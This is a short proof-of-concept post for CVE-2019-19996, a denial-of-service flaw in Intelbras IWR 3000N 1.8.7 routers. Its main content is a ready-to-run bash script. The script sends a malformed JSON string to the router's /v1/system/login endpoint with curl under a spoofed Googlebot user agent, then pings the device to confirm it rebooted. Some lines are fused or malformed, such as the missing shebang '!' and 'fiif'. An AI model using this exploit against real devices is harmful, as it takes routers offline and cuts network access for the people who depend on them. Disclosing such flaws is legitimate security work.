DoS — CVE-2019–19996
2 min readDec 26, 2019
An issue was discovered on Intelbras IWR 3000N 1.8.7 devices. A malformed login request allows remote attackers to cause a denial of service (reboot), as demonstrated by JSON misparsing of the \””} string to v1/system/login.
Proof Of Concept
First Step —
Router is active on ip 10.0.0.1.
Second Step —
Run denial of service attack exploit.
#/bin/bash
clear
read -p "Enter Target Address and Port: " target port # localhost 80alive=$(ping -c 1 $target | grep icmp* | wc -l)
if [ "$alive" -eq 0 ]; then
echo Target is down or offiline.
read -p "Would you Like to Proceed? (Y/n): " ans
if [ "$ans" = 'n' ] || [ "$ans" = 'N' ]; then
clear
exit
fi
fiif [ "$port" -lt 65536 ] && [ "$port" -gt 0 ]; then
grab=$(curl -s -A 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)' --compressed --data-binary '\""}' $target:$port/v1/system/login)
else
echo "Incorrect Port."
ficlear
alive=$(ping -c 1 $target | grep icmp* | wc -l)
if [ "$alive" -eq 0 ]; then
echo Successfully router Offline.
else
echo Unsuccessfull, Target Not be Vulnerable.
fiSet IP and port
Third Step —
When executing the exploit the router will be denied service attack and will reboot.
Video —
